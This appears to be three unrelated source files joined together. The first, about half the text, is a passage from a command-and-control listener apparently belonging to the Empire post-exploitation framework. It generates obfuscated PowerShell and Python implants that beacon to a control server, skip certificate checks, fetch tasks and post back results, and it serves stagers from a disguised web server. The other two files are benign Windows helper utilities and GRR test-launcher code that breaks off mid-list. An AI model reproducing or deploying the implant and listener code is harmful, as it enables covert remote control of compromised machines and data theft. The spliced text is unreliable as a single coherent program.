if obfuscate:
code = helpers.obfuscate(self.mainMenu.installPath, code, obfuscationCommand=obfuscationCommand)
return code
elif language == 'python':
f = open(self.mainMenu.installPath + "./data/agent/agent.py")
code = f.read()
f.close()
# patch in the comms methods
commsCode = self.generate_comms(listenerOptions=listenerOptions, language=language)
code = code.replace('REPLACE_COMMS', commsCode)
# strip out comments and blank lines
code = helpers.strip_python_comments(code)
# patch in the delay, jitter, lost limit, and comms profile
code = code.replace('delay = 60', 'delay = %s' % (delay))
code = code.replace('jitter = 0.0', 'jitter = %s' % (jitter))
code = code.replace(
'profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"',
'profile = "%s"' % (profile))
code = code.replace('lostLimit = 60', 'lostLimit = %s' % (lostLimit))
code = code.replace('defaultResponse = base64.b64decode("")',
'defaultResponse = base64.b64decode("%s")' % (b64DefaultResponse.decode("UTF-8")))
# patch in the killDate and workingHours if they're specified
if killDate != "":
code = code.replace('killDate = ""', 'killDate = "%s"' % (killDate))
if workingHours != "":
code = code.replace('workingHours = ""', 'workingHours = "%s"' % (workingHours))
return code
else:
print(helpers.color(
"[!] listeners/http generate_agent(): invalid language specification, only 'powershell' and 'python' are currently supported for this module."))
def generate_comms(self, listenerOptions, language=None):
"""
Generate just the agent communication code block needed for communications with this listener.
This is so agents can easily be dynamically updated for the new listener.
"""
if language:
if language.lower() == 'powershell':
updateServers = """
$Script:ControlServers = @("%s");
$Script:ServerIndex = 0;
""" % (listenerOptions['Host']['Value'])
if listenerOptions['Host']['Value'].startswith('https'):
updateServers += "\n[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};"
getTask = """
$script:GetTask = {
try {
if ($Script:ControlServers[$Script:ServerIndex].StartsWith("http")) {
# meta 'TASKING_REQUEST' : 4
$RoutingPacket = New-RoutingPacket -EncData $Null -Meta 4
$RoutingCookie = [Convert]::ToBase64String($RoutingPacket)
# build the web request object
$""" + helpers.generate_random_script_var_name("wc") + """ = New-Object System.Net.WebClient
# set the proxy settings for the WC to be the default system settings
$""" + helpers.generate_random_script_var_name("wc") + """.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
$""" + helpers.generate_random_script_var_name("wc") + """.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
if($Script:Proxy) {
$""" + helpers.generate_random_script_var_name("wc") + """.Proxy = $Script:Proxy;
}
$""" + helpers.generate_random_script_var_name("wc") + """.Headers.Add("User-Agent",$script:UserAgent)
$script:Headers.GetEnumerator() | % {$""" + helpers.generate_random_script_var_name(
"wc") + """.Headers.Add($_.Name, $_.Value)}
$""" + helpers.generate_random_script_var_name(
"wc") + """.Headers.Add("Cookie",\"""" + self.session_cookie + """session=$RoutingCookie")
# choose a random valid URI for checkin
$taskURI = $script:TaskURIs | Get-Random
$result = $""" + helpers.generate_random_script_var_name("wc") + """.DownloadData($Script:ControlServers[$Script:ServerIndex] + $taskURI)
$result
}
}
catch [Net.WebException] {
$script:MissedCheckins += 1
if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {
# restart key negotiation
Start-Negotiate -S "$ser" -SK $SK -UA $ua
}
}
}
"""
sendMessage = """
$script:SendMessage = {
param($Packets)
if($Packets) {
# build and encrypt the response packet
$EncBytes = Encrypt-Bytes $Packets
# build the top level RC4 "routing packet"
# meta 'RESULT_POST' : 5
$RoutingPacket = New-RoutingPacket -EncData $EncBytes -Meta 5
if($Script:ControlServers[$Script:ServerIndex].StartsWith('http')) {
# build the web request object
$""" + helpers.generate_random_script_var_name("wc") + """ = New-Object System.Net.WebClient
# set the proxy settings for the WC to be the default system settings
$""" + helpers.generate_random_script_var_name("wc") + """.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
$""" + helpers.generate_random_script_var_name("wc") + """.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
if($Script:Proxy) {
$""" + helpers.generate_random_script_var_name("wc") + """.Proxy = $Script:Proxy;
}
$""" + helpers.generate_random_script_var_name("wc") + """.Headers.Add('User-Agent', $Script:UserAgent)
$Script:Headers.GetEnumerator() | ForEach-Object {$""" + helpers.generate_random_script_var_name(
"wc") + """.Headers.Add($_.Name, $_.Value)}
try {
# get a random posting URI
$taskURI = $Script:TaskURIs | Get-Random
$response = $""" + helpers.generate_random_script_var_name("wc") + """.UploadData($Script:ControlServers[$Script:ServerIndex]+$taskURI, 'POST', $RoutingPacket);
}
catch [System.Net.WebException]{
# exception posting data...
if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {
# restart key negotiation
Start-Negotiate -S "$ser" -SK $SK -UA $ua
}
}
}
}
}
"""
return updateServers + getTask + sendMessage
elif language.lower() == 'python':
updateServers = "server = '%s'\n" % (listenerOptions['Host']['Value'])
if listenerOptions['Host']['Value'].startswith('https'):
updateServers += "hasattr(ssl, '_create_unverified_context') and ssl._create_unverified_context() or None"
sendMessage = """
def send_message(packets=None):
# Requests a tasking or posts data to a randomized tasking URI.
# If packets == None, the agent GETs a tasking from the control server.
# If packets != None, the agent encrypts the passed packets and
# POSTs the data to the control server.
global missedCheckins
global server
global headers
global taskURIs
data = None
if packets:
data = ''.join(packets.decode('latin-1'))
# aes_encrypt_then_hmac is in stager.py
encData = aes_encrypt_then_hmac(key, data)
data = build_routing_packet(stagingKey, sessionID, meta=5, encData=encData)
else:
# if we're GETing taskings, then build the routing packet to stuff into a cookie first.
# meta TASKING_REQUEST = 4
routingPacket = build_routing_packet(stagingKey, sessionID, meta=4)
b64routingPacket = base64.b64encode(routingPacket).decode('UTF-8')
headers['Cookie'] = \"""" + self.session_cookie + """session=%s" % (b64routingPacket)
taskURI = random.sample(taskURIs, 1)[0]
requestUri = server + taskURI
try:
data = (urllib.urlopen(urllib.Request(requestUri, data, headers))).read()
return ('200', data)
except urllib.HTTPError as HTTPError:
# if the server is reached, but returns an error (like 404)
missedCheckins = missedCheckins + 1
#if signaled for restaging, exit.
if HTTPError.code == 401:
sys.exit(0)
return (HTTPError.code, '')
except urllib.URLError as URLerror:
# if the server cannot be reached
missedCheckins = missedCheckins + 1
return (URLerror.reason, '')
return ('', '')
"""
return updateServers + sendMessage
else:
print(helpers.color(
"[!] listeners/http generate_comms(): invalid language specification, only 'powershell' and 'python' are currently supported for this module."))
else:
print(helpers.color('[!] listeners/http generate_comms(): no language specified!'))
def start_server(self, listenerOptions):
"""
Threaded function that actually starts up the Flask server.
"""
# make a copy of the currently set listener options for later stager/agent generation
listenerOptions = copy.deepcopy(listenerOptions)
# suppress the normal Flask output
log = logging.getLogger('werkzeug')
log.setLevel(logging.ERROR)
bindIP = listenerOptions['BindIP']['Value']
host = listenerOptions['Host']['Value']
port = listenerOptions['Port']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
stagerURI = listenerOptions['StagerURI']['Value']
userAgent = self.options['UserAgent']['Value']
listenerName = self.options['Name']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
app = Flask(__name__)
self.app = app
@app.route('/download/<stager>')
def send_stager(stager):
if 'po' in stager:
launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='powershell', encode=False,
userAgent=userAgent, proxy=proxy,
proxyCreds=proxyCreds)
return launcher
elif 'py' in stager:
launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='python', encode=False,
userAgent=userAgent, proxy=proxy,
proxyCreds=proxyCreds)
return launcher
else:
return make_response(self.default_response(), 404)
@app.before_request
def check_ip():
"""
Before every request, check if the IP address is allowed.
"""
if not self.mainMenu.agents.is_ip_allowed(request.remote_addr):
listenerName = self.options['Name']['Value']
message = "[!] {} on the blacklist/not on the whitelist requested resource".format(request.remote_addr)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
return make_response(self.default_response(), 404)
@app.after_request
def change_header(response):
"Modify the headers response server."
headers = listenerOptions['Headers']['Value']
for key in headers.split("|"):
value = key.split(":")
response.headers[value[0]] = value[1]
return response
@app.after_request
def add_proxy_headers(response):
"Add HTTP headers to avoid proxy caching."
response.headers['Cache-Control'] = "no-cache, no-store, must-revalidate"
response.headers['Pragma'] = "no-cache"
response.headers['Expires'] = "0"
return response
@app.route('/')
@app.route('/index.html')
def serve_index():
"""
Return default server web page if user navigates to index.
"""
static_dir = self.mainMenu.installPath + "data/misc/"
return make_response(self.index_page(), 200)
@app.route('/welcome.png')
def serve_index_helper():
"""
Serves image loaded by index page.
"""
static_dir = self.mainMenu.installPath + "data/misc/"
return send_from_directory(static_dir, 'welcome.png')
@app.route('/<path:request_uri>', methods=['GET'])
def handle_get(request_uri):
"""
Handle an agent GET request.
This is used during the first step of the staging process,
and when the agent requests taskings.
"""
clientIP = request.remote_addr
listenerName = self.options['Name']['Value']
message = "[*] GET request for {}/{} from {}".format(request.host, request_uri, clientIP)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
routingPacket = None
cookie = request.headers.get('Cookie')
if cookie and cookie != '':
try:
# see if we can extract the 'routing packet' from the specified cookie location
# NOTE: this can easily be moved to a parameter, another cookie value, etc.
if self.session_cookie in cookie:
listenerName = self.options['Name']['Value']
message = "[*] GET cookie value from {} : {}".format(clientIP, cookie)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
cookieParts = cookie.split(';')
for part in cookieParts:
if part.startswith(self.session_cookie):
base64RoutingPacket = part[part.find('=') + 1:]
# decode the routing packet base64 value in the cookie
routingPacket = base64.b64decode(base64RoutingPacket)
except Exception as e:
routingPacket = None
pass
if routingPacket:
# parse the routing packet and process the results
dataResults = self.mainMenu.agents.handle_agent_data(stagingKey, routingPacket, listenerOptions,
clientIP)
if dataResults and len(dataResults) > 0:
for (language, results) in dataResults:
if results:
if isinstance(results, str):
results = results.encode('UTF-8')
if results == b'STAGE0':
# handle_agent_data() signals that the listener should return the stager.ps1 code
# step 2 of negotiation -> return stager.ps1 (stage 1)
listenerName = self.options['Name']['Value']
message = "\n[*] Sending {} stager (stage 1) to {}".format(language, clientIP)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
stage = self.generate_stager(language=language, listenerOptions=listenerOptions,
obfuscate=self.mainMenu.obfuscate,
obfuscationCommand=self.mainMenu.obfuscateCommand)
return make_response(stage, 200)
elif results.startswith(b'ERROR:'):
listenerName = self.options['Name']['Value']
message = "[!] Error from agents.handle_agent_data() for {} from {}: {}".format(
request_uri, clientIP, results)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
if b'not in cache' in results:
# signal the client to restage
print(helpers.color("[*] Orphaned agent from %s, signaling restaging" % (clientIP)))
return make_response(self.default_response(), 401)
else:
return make_response(self.default_response(), 200)
else:
# actual taskings
listenerName = self.options['Name']['Value']
message = "[*] Agent from {} retrieved taskings".format(clientIP)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
return make_response(results, 200)
else:
# dispatcher.send("[!] Results are None...", sender='listeners/http')
return make_response(self.default_response(), 200)
else:
return make_response(self.default_response(), 200)
else:
listenerName = self.options['Name']['Value']
message = "[!] {} requested by {} with no routing packet.".format(request_uri, clientIP)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
return make_response(self.default_response(), 200)
@app.route('/<path:request_uri>', methods=['POST'])
def handle_post(request_uri):
"""
Handle an agent POST request.
"""
stagingKey = listenerOptions['StagingKey']['Value']
clientIP = request.remote_addr
requestData = request.get_data()
listenerName = self.options['Name']['Value']
message = "[*] POST request data length from {} : {}".format(clientIP, len(requestData))
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
# the routing packet should be at the front of the binary request.data
# NOTE: this can also go into a cookie/etc.
dataResults = self.mainMenu.agents.handle_agent_data(stagingKey, requestData, listenerOptions, clientIP)
if dataResults and len(dataResults) > 0:
for (language, results) in dataResults:
if isinstance(results, str):
results = results.encode('UTF-8')
if results:
if results.startswith(b'STAGE2'):
# TODO: document the exact results structure returned
if ':' in clientIP:
clientIP = '[' + str(clientIP) + ']'
sessionID = results.split(b' ')[1].strip().decode('UTF-8')
sessionKey = self.mainMenu.agents.agents[sessionID]['sessionKey']
listenerName = self.options['Name']['Value']
message = "[*] Sending agent (stage 2) to {} at {}".format(sessionID, clientIP)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
hopListenerName = request.headers.get('Hop-Name')
try:
hopListener = helpers.get_listener_options(hopListenerName)
tempListenerOptions = copy.deepcopy(listenerOptions)
tempListenerOptions['Host']['Value'] = hopListener['Host']['Value']
except TypeError:
tempListenerOptions = listenerOptions
# step 6 of negotiation -> server sends patched agent.ps1/agent.py
agentCode = self.generate_agent(language=language, listenerOptions=tempListenerOptions,
obfuscate=self.mainMenu.obfuscate,
obfuscationCommand=self.mainMenu.obfuscateCommand)
encryptedAgent = encryption.aes_encrypt_then_hmac(sessionKey, agentCode)
# TODO: wrap ^ in a routing packet?
return make_response(encryptedAgent, 200)
elif results[:10].lower().startswith(b'error') or results[:10].lower().startswith(b'exception'):
listenerName = self.options['Name']['Value']
message = "[!] Error returned for results by {} : {}".format(clientIP, results)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
return make_response(self.default_response(), 404)
elif results.startswith(b'VALID'):
listenerName = self.options['Name']['Value']
message = "[*] Valid results returned by {}".format(clientIP)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
return make_response(self.default_response(), 200)
else:
return make_response(results, 200)
else:
return make_response(self.default_response(), 404)
else:
return make_response(self.default_response(), 404)
try:
certPath = listenerOptions['CertPath']['Value']
host = listenerOptions['Host']['Value']
if certPath.strip() != '' and host.startswith('https'):
certPath = os.path.abspath(certPath)
# support any version of TLS
pyversion = sys.version_info
if pyversion[0] == 2 and pyversion[1] == 7 and pyversion[2] >= 13:
proto = ssl.PROTOCOL_TLS
elif pyversion[0] >= 3:
proto = ssl.PROTOCOL_TLS
else:
proto = ssl.PROTOCOL_SSLv23
context = ssl.SSLContext(proto)
context.load_cert_chain("%s/empire-chain.pem" % (certPath), "%s/empire-priv.key" % (certPath))
cipherlist_tls12 = ["ECDHE-RSA-AES256-GCM-SHA384", "ECDHE-RSA-AES128-GCM-SHA256", "ECDHE-RSA-AES256-SHA384", "AES256-SHA256", "AES128-SHA256"]
cipherlist_tls10 = ["ECDHE-RSA-AES256-SHA"]
selectciph = random.choice(cipherlist_tls12)+':'+random.choice(cipherlist_tls10)
context.set_ciphers(selectciph)
app.run(host=bindIP, port=int(port), threaded=True, ssl_context=context)
else:
app.run(host=bindIP, port=int(port), threaded=True)
except Exception as e:
print(helpers.color("[!] Listener startup on port %s failed: %s " % (port, e)))
listenerName = self.options['Name']['Value']
message = "[!] Listener startup on port {} failed: {}".format(port, e)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
def start(self, name=''):
"""
Start a threaded instance of self.start_server() and store it in the
self.threads dictionary keyed by the listener name.
"""
listenerOptions = self.options
if name and name != '':
self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,))
self.threads[name].start()
time.sleep(1)
# returns True if the listener successfully started, false otherwise
return self.threads[name].is_alive()
else:
name = listenerOptions['Name']['Value']
self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,))
self.threads[name].start()
time.sleep(1)
# returns True if the listener successfully started, false otherwise
return self.threads[name].is_alive()
def shutdown(self, name=''):
"""
Terminates the server thread stored in the self.threads dictionary,
keyed by the listener name.
"""
if name and name != '':
print(helpers.color("[!] Killing listener '%s'" % (name)))
self.threads[name].kill()
else:
print(helpers.color("[!] Killing listener '%s'" % (self.options['Name']['Value'])))
self.threads[self.options['Name']['Value']].kill()
def generate_cookie(self):
"""
Generate Cookie
"""
chars = string.ascii_letters
cookie = helpers.random_string(random.randint(6, 16), charset=chars)
return cookie
|
helper.py
|
# -*- coding: utf-8 -*-
import os
from warnings import warn
import ctypes
import win32ui
from threading import Barrier, Thread
import contextlib
import shutil
import tempfile
#%%
def lock_until_file_is_safe(filename):
opened = False
while not opened:
try:
with open(filename):
opened=True
except (FileNotFoundError, PermissionError):
pass
return True
def lock_until_files_are_safe(filenames):
def lock(f, b):
lock_until_file_is_safe(f)
b.wait()
barrier = Barrier(len(filenames)+1)
for filename in filenames:
t = Thread(target=lock, args=(filename, barrier, ))
t.start()
barrier.wait()
def file_exists(path):
return os.path.exists(path)
def delete_file(fname):
return os.remove(fname)
def assert_file_exists(path):
try:
assert file_exists(path)
except AssertionError as e:
print('{0} was not found'.format(path))
raise e
return True
def is_file(filename: str, ext: str) -> (bool, str):
cur_ext = os.path.splitext(filename)[1]
if not cur_ext == ext:
warn('''Filename does not end in {0}. \r
Warning: changing the extension to {0}'''.format(ext))
return False, filename.replace(cur_ext, ext)
else:
return True, filename
#%%
def find_file(name:str, path:str=None):
'''finds and returns the path to a file with given name
args
----
name:str
name of the file to search
path:str
folder to start looking, defaults to root (e.g. C:\\ or \)
returns
-------
path:str
path to file with given name
'''
if path is None:
path = os.path.abspath(os.sep)
for root, dirs, files in os.walk(path):
if name in files:
return os.path.join(root, name)
#%%
def list_all_window_titles():
EnumWindows = ctypes.windll.user32.EnumWindows
EnumWindowsProc = ctypes.WINFUNCTYPE(ctypes.c_bool, ctypes.POINTER(ctypes.c_int), ctypes.POINTER(ctypes.c_int))
GetWindowText = ctypes.windll.user32.GetWindowTextW
GetWindowTextLength = ctypes.windll.user32.GetWindowTextLengthW
IsWindowVisible = ctypes.windll.user32.IsWindowVisible
titles = []
def foreach_window(hwnd, lParam):
if IsWindowVisible(hwnd):
length = GetWindowTextLength(hwnd)
buff = ctypes.create_unicode_buffer(length + 1)
GetWindowText(hwnd, buff, length + 1)
titles.append(buff.value)
return True
EnumWindows(EnumWindowsProc(foreach_window), 0)
return titles
def window_exists(classname):
try:
win32ui.FindWindow(None, classname)
except win32ui.error:
return False
else:
return True
def assert_window_exists(window_title):
try:
assert(window_exists(window_title))
except AssertionError as e:
print('{0} was not found'.format(window_title))
raise e
return True
# %%
@contextlib.contextmanager
def cd(newdir, cleanup=lambda: True):
prevdir = os.getcwd()
os.chdir(os.path.expanduser(newdir))
try:
yield
finally:
os.chdir(prevdir)
cleanup()
@contextlib.contextmanager
def tempdir():
dirpath = tempfile.mkdtemp()
def cleanup():
shutil.rmtree(dirpath)
with cd(dirpath, cleanup):
yield dirpath
#%%
def make_library(pathdir:str):
d = {}
for fname in os.listdir(pathdir):
if os.path.splitext(fname)[1] =='.stm':
key = os.path.splitext(fname)[0]
val = os.path.join(pathdir, fname)
print(f'Create {key} linking to {val}')
d[key] = val
return d
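# Usage sketch (illustrative only; file names are examples). tempdir() creates
# a temporary directory, cd()'s into it for the duration of the with-block, and
# removes it on exit; lock_until_file_is_safe() busy-waits until the file can
# be opened (i.e. it exists and is not locked by another process):
#
#     with tempdir() as workdir:
#         with open('scratch.txt', 'w') as f:
#             f.write('hello')
#         lock_until_file_is_safe('scratch.txt')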
|
self_contained_components.py
|
#!/usr/bin/env python
# Lint as: python3
"""Functions to run individual GRR components during self-contained testing."""
import atexit
import collections
import os
import platform
import shutil
import signal
import subprocess
import sys
import tempfile
import threading
import time
from typing import Dict, Iterable, List, Optional, Union, Text
import portpicker
from google.protobuf import text_format
from grr_response_core.lib import package
from grr_response_test.lib import api_helpers
from fleetspeak.src.client.daemonservice.proto.fleetspeak_daemonservice import config_pb2 as daemonservice_config_pb2
from fleetspeak.src.client.generic.proto.fleetspeak_client_generic import config_pb2 as client_config_pb2
from fleetspeak.src.common.proto.fleetspeak import system_pb2
from fleetspeak.src.config.proto.fleetspeak_config import config_pb2
from fleetspeak.src.server.grpcservice.proto.fleetspeak_grpcservice import grpcservice_pb2
from fleetspeak.src.server.proto.fleetspeak_server import server_pb2
from fleetspeak.src.server.proto.fleetspeak_server import services_pb2
ComponentOptions = Dict[str, Union[int, str]]
class Error(Exception):
"""Module-specific base error class."""
class ConfigInitializationError(Error):
"""Raised when a self-contained config can't be written."""
def _ComponentOptionsToArgs(options: Optional[ComponentOptions]) -> List[str]:
if options is None:
return []
args = []
for k, v in options.items():
args.extend(["-p", "%s=%s" % (k, v)])
return args
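# Illustrative example (the keys below are arbitrary): every option becomes its
# own "-p key=value" pair, e.g.
#   _ComponentOptionsToArgs({"AdminUI.port": 8000, "Logging.verbose": "True"})
#   == ["-p", "AdminUI.port=8000", "-p", "Logging.verbose=True"]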
def _GetServerComponentArgs(config_path: str) -> List[str]:
"""Returns a set of command line arguments for server components.
Args:
config_path: Path to a config path generated by
self_contained_config_writer.
Returns:
An iterable with command line arguments to use.
"""
primary_config_path = package.ResourcePath(
"grr-response-core", "install_data/etc/grr-server.yaml")
secondary_config_path = package.ResourcePath(
"grr-response-test", "grr_response_test/test_data/grr_test.yaml")
return [
"--config",
primary_config_path,
"--secondary_configs",
",".join([secondary_config_path, config_path]),
"-p",
"Monitoring.http_port=%d" % portpicker.pick_unused_port(),
"-p",
"AdminUI.webauth_manager=NullWebAuthManager",
]
def _GetRunEndToEndTestsArgs(
client_id,
server_config_path,
tests: Optional[Iterable[str]] = None,
manual_tests: Optional[Iterable[str]] = None) -> List[str]:
"""Returns arguments needed to configure run_end_to_end_tests process.
Args:
client_id: String with a client id pointing to an already running client.
server_config_path: Path to the server configuration file.
tests: (Optional) List of tests to run.
manual_tests: (Optional) List of manual tests to not skip.
Returns:
An iterable with command line arguments.
"""
port = api_helpers.GetAdminUIPortFromConfig(server_config_path)
api_endpoint = "http://localhost:%d" % port
args = [
"--api_endpoint",
api_endpoint,
"--api_user",
"admin",
"--api_password",
"admin",
"--client_id",
client_id,
"--ignore_test_context",
"True",
]
if tests is not None:
args += ["--run_only_tests", ",".join(tests)]
if manual_tests is not None:
args += ["--manual_tests", ",".join(manual_tests)]
return args
def _StartBinary(binary_path: str, args: List[str]) -> subprocess.Popen:
"""Starts a new process with a given binary and args.
Started subprocess will be killed automatically on exit.
Args:
binary_path: A binary to run.
args: An iterable with program arguments (not containing the program
executable).
Returns:
Popen object corresponding to a started process.
"""
popen_args = [binary_path] + args
print("Starting binary: " + " ".join(popen_args))
process = subprocess.Popen(
popen_args, bufsize=0, stdout=None, stderr=subprocess.STDOUT)
def KillOnExit():
if process.poll() is None:
process.kill()
process.wait()
atexit.register(KillOnExit)
return process
def _StartComponent(main_package: str, args: List[str]) -> subprocess.Popen:
"""Starts a new process with a given component.
This starts a Python interpreter with a "-u" argument (to turn off output
buffering) and with a "-m" argument followed by the main package name, thus
effectively executing the main() function of a given package.
Args:
main_package: Main package path.
args: An iterable with program arguments (not containing the program
executable).
Returns:
Popen object corresponding to a started process.
"""
popen_args = [sys.executable, "-u", "-m", main_package] + args
print("Starting %s component: %s" % (main_package, " ".join(popen_args)))
process = subprocess.Popen(
popen_args, bufsize=0, stdout=None, stderr=subprocess.STDOUT)
print("Component %s pid: %d" % (main_package, process.pid))
def KillOnExit():
if process.poll() is None:
print("Killing %s." % main_package)
process.kill()
process.wait()
atexit.register(KillOnExit)
return process
GRRConfigs = collections.namedtuple("GRRConfigs", [
"server_config",
"client_config",
])
def InitGRRConfigs(mysql_database: str,
mysql_username: Optional[str] = None,
mysql_password: Optional[str] = None,
logging_path: Optional[str] = None,
osquery_path: Optional[str] = None,
with_fleetspeak: bool = False) -> GRRConfigs:
"""Initializes server and client config files."""
# Create 2 temporary files to contain server and client configuration files
# that we're about to generate.
#
# TODO(user): migrate to TempFilePath as soon grr.test_lib is moved to
# grr_response_test.
fd, built_server_config_path = tempfile.mkstemp(".yaml")
os.close(fd)
print("Using temp server config path: %s" % built_server_config_path)
fd, built_client_config_path = tempfile.mkstemp(".yaml")
os.close(fd)
print("Using temp client config path: %s" % built_client_config_path)
def CleanUpConfigs():
os.remove(built_server_config_path)
os.remove(built_client_config_path)
atexit.register(CleanUpConfigs)
# Generate server and client configs.
config_writer_flags = [
"--dest_server_config_path",
built_server_config_path,
"--dest_client_config_path",
built_client_config_path,
"--config_mysql_database",
mysql_database,
]
if mysql_username is not None:
config_writer_flags.extend(["--config_mysql_username", mysql_username])
if mysql_password is not None:
config_writer_flags.extend(["--config_mysql_password", mysql_password])
if logging_path is not None:
config_writer_flags.extend(["--config_logging_path", logging_path])
if osquery_path is not None:
config_writer_flags.extend(["--config_osquery_path", osquery_path])
if with_fleetspeak:
config_writer_flags.extend(["--config_with_fleetspeak"])
p = _StartComponent(
"grr_response_test.lib.self_contained_config_writer",
config_writer_flags)
if p.wait() != 0:
raise ConfigInitializationError("ConfigWriter execution failed: {}".format(
p.returncode))
return GRRConfigs(built_server_config_path, built_client_config_path)
FleetspeakConfigs = collections.namedtuple("FleetspeakConfigs", [
"server_components_config",
"server_services_config",
"client_config",
])
def InitFleetspeakConfigs(
grr_configs: GRRConfigs,
mysql_database: str,
mysql_username: Optional[str] = None,
mysql_password: Optional[str] = None) -> FleetspeakConfigs:
"""Initializes Fleetspeak server and client configs."""
fs_frontend_port, fs_admin_port = api_helpers.GetFleetspeakPortsFromConfig(
grr_configs.server_config)
mysql_username = mysql_username or ""
mysql_password = mysql_password or ""
temp_root = tempfile.mkdtemp(suffix="_fleetspeak")
def TempPath(*args):
return os.path.join(temp_root, *args)
cp = config_pb2.Config(configuration_name="Self-contained testing")
cp.components_config.mysql_data_source_name = "%s:%s@tcp(127.0.0.1:3306)/%s" % (
mysql_username, mysql_password, mysql_database)
cp.components_config.https_config.listen_address = "localhost:%d" % portpicker.pick_unused_port(
)
# TODO(user): Use streaming connections by default. At the moment
# a few tests are failing with MySQL errors when streaming is used.
cp.components_config.https_config.disable_streaming = True
cp.components_config.admin_config.listen_address = ("localhost:%d" %
fs_admin_port)
cp.public_host_port.append(cp.components_config.https_config.listen_address)
cp.server_component_configuration_file = TempPath("server.config")
cp.trusted_cert_file = TempPath("trusted_cert.pem")
cp.trusted_cert_key_file = TempPath("trusted_cert_key.pem")
cp.server_cert_file = TempPath("server_cert.pem")
cp.server_cert_key_file = TempPath("server_cert_key.pem")
cp.linux_client_configuration_file = TempPath("linux_client.config")
cp.windows_client_configuration_file = TempPath("windows_client.config")
cp.darwin_client_configuration_file = TempPath("darwin_client.config")
built_configurator_config_path = TempPath("configurator.config")
with open(built_configurator_config_path, mode="w", encoding="utf-8") as fd:
fd.write(text_format.MessageToString(cp))
p = _StartBinary(
"fleetspeak-config",
["--logtostderr", "--config", built_configurator_config_path])
if p.wait() != 0:
raise ConfigInitializationError(
"fleetspeak-config execution failed: {}".format(p.returncode))
# Adjust client config.
with open(
cp.linux_client_configuration_file, mode="r", encoding="utf-8") as fd:
conf_content = fd.read()
conf = text_format.Parse(conf_content, client_config_pb2.Config())
conf.filesystem_handler.configuration_directory = temp_root
conf.filesystem_handler.state_file = TempPath("client.state")
with open(
cp.linux_client_configuration_file, mode="w", encoding="utf-8") as fd:
fd.write(text_format.MessageToString(conf))
# Write client services configuration.
service_conf = system_pb2.ClientServiceConfig(name="GRR", factory="Daemon")
payload = daemonservice_config_pb2.Config()
payload.argv.extend([
sys.executable, "-u", "-m",
"grr_response_client.grr_fs_client",
"--config", grr_configs.client_config
])
# TODO(user): remove this condition when Fleetspeak is used as a nanny
# on all platforms.
if platform.system() == "Windows":
payload.monitor_heartbeats = True
payload.heartbeat_unresponsive_grace_period_seconds = 45
payload.heartbeat_unresponsive_kill_period_seconds = 15
service_conf.config.Pack(payload)
os.mkdir(TempPath("textservices"))
with open(
TempPath("textservices", "GRR.textproto"), mode="w",
encoding="utf-8") as fd:
fd.write(text_format.MessageToString(service_conf))
# Server services configuration.
service_config = services_pb2.ServiceConfig(name="GRR", factory="GRPC")
grpc_config = grpcservice_pb2.Config(
target="localhost:%d" % fs_frontend_port, insecure=True)
service_config.config.Pack(grpc_config)
server_conf = server_pb2.ServerConfig(services=[service_config])
server_conf.broadcast_poll_time.seconds = 1
built_server_services_config_path = TempPath("server.services.config")
with open(
built_server_services_config_path, mode="w", encoding="utf-8") as fd:
fd.write(text_format.MessageToString(server_conf))
return FleetspeakConfigs(cp.server_component_configuration_file,
built_server_services_config_path,
cp.linux_client_configuration_file)
def StartServerProcesses(
grr_configs: GRRConfigs,
fleetspeak_configs: Optional[FleetspeakConfigs] = None,
) -> List[subprocess.Popen]:
"""Starts GRR server processes (optionally behind Fleetspeak frontend)."""
def Args():
return _GetServerComponentArgs(grr_configs.server_config)
if fleetspeak_configs is None:
return [
_StartComponent(
"grr_response_server.gui.admin_ui",
Args()),
_StartComponent(
"grr_response_server.bin.frontend",
Args()),
_StartComponent(
"grr_response_server.bin.worker",
Args()),
]
else:
return [
_StartBinary("fleetspeak-server", [
"-logtostderr",
"-components_config",
fleetspeak_configs.server_components_config,
"-services_config",
fleetspeak_configs.server_services_config,
]),
_StartComponent(
"grr_response_server.bin.fleetspeak_frontend",
Args()),
_StartComponent(
"grr_response_server.gui.admin_ui",
Args()),
_StartComponent(
"grr_response_server.bin.worker",
Args()),
]
def StartClientProcess(grr_configs: GRRConfigs,
fleetspeak_configs: Optional[FleetspeakConfigs] = None,
verbose: bool = False) -> subprocess.Popen:
"""Starts a GRR client or Fleetspeak client configured to run GRR."""
if fleetspeak_configs is None:
return _StartComponent(
"grr_response_client.client",
["--config", grr_configs.client_config] +
(["--verbose"] if verbose else []))
else:
return _StartBinary("fleetspeak-client", [
"-logtostderr",
"-std_forward",
